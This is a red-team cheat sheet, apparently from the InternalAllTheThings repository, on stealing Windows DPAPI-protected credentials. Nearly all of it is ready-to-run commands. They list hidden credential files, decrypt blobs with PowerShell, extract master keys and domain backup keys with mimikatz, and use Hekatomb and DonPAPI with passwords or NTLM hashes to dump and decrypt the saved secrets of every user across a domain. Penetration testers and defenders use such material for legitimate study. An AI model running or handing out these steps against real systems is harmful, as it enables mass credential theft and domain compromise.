windows-dpapi.md (4871B)
1 --- 2 title: "Windows - DPAPI" 3 section: "Red Team" 4 sectionSlug: "redteam" 5 sourcePath: "docs/redteam/evasion/windows-dpapi.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/evasion/windows-dpapi.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Windows - DPAPI 12 13 > On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft's Data Protection API and stored as "blob" files in user AppData folder. 14 15 ## Summary 16 17 * [Data Protection API](#data-protection-api) 18 * [List Credential Files](#list-credential-files) 19 * [DPAPI LocalMachine Context](#dpapi-localmachine-context) 20 * [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi) 21 * [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain) 22 * [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely) 23 24 ## Data Protection API 25 26 * Outside of a domain: the user's `password hash` is used to encrypt these "blobs". 27 * Inside a domain: the `domain controller's master key` is used to encrypt these blobs. 28 29 With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work 30 stations in the domain. 31 32 ```ps1 33 vaultcmd /list 34 35 VaultCmd /listcreds:<namevault>|<guidvault> /all 36 vaultcmd /listcreds:"Windows Credentials" /all 37 ``` 38 39 ### List Credential Files 40 41 ```ps1 42 dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\ 43 dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\ 44 45 Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ 46 Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ 47 ``` 48 49 ### DPAPI LocalMachine Context 50 51 The `LocalMachine` context is used to protect data that is intended to be shared across different users or services on a single machine. This means that any user or service running on the machine can access the protected data with the appropriate credentials. 52 53 In contrast, the `CurrentUser` context is used to protect data that is intended to be accessed only by the user who encrypted it, and cannot be accessed by other users or services on the same machine. 54 55 ```ps1 56 $a = [System.Convert]::FromBase64String("AQAAANCMnd[...]") 57 $b = [System.Security.Cryptography.ProtectedData]::Unprotect($a, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine) 58 [System.Text.Encoding]::ASCII.GetString($b) 59 ``` 60 61 ### Mimikatz - Credential Manager & DPAPI 62 63 ```powershell 64 # check the folder to find credentials 65 dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\* 66 67 # check the file with mimikatz 68 mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 69 # find master key 70 mimikatz !sekurlsa::dpapi 71 # use master key 72 mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b 73 74 # find and export backup keys 75 lsadump::backupkeys /system:dc01.lab.local /export 76 # use backup keys 77 dpapi::masterkey /in:"C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk 78 ``` 79 80 ### Hekatomb - Steal all credentials on domain 81 82 > [ProcessusT/Hekatomb](https://github.com/ProcessusT/HEKATOMB) is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials. 83 84 ```python 85 pip3 install hekatomb 86 hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp 87 ``` 88 89  90 91 ### DonPAPI - Dumping DPAPI credz remotely 92 93 * [login-securite/DonPAPI](https://github.com/login-securite/DonPAPI) 94 95 ```ps1 96 DonPAPI.py domain/user:passw0rd@target 97 DonPAPI.py --hashes <LM>:<NT> domain/user@target 98 99 # using domain backup key 100 dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip 101 python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list 102 ``` 103 104 ## References 105 106 * [DPAPI - Extracting Passwords - HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) 107 * [DON PAPI, OU L’ART D’ALLER PLUS LOIN QUE LE DOMAIN ADMIN - LoginSecurité - CORTO GUEGUEN - 4 MARS 2022](https://www.login-securite.com/2022/03/04/don-papi-ou-lart-daller-plus-loin-que-le-avec-dpapi/)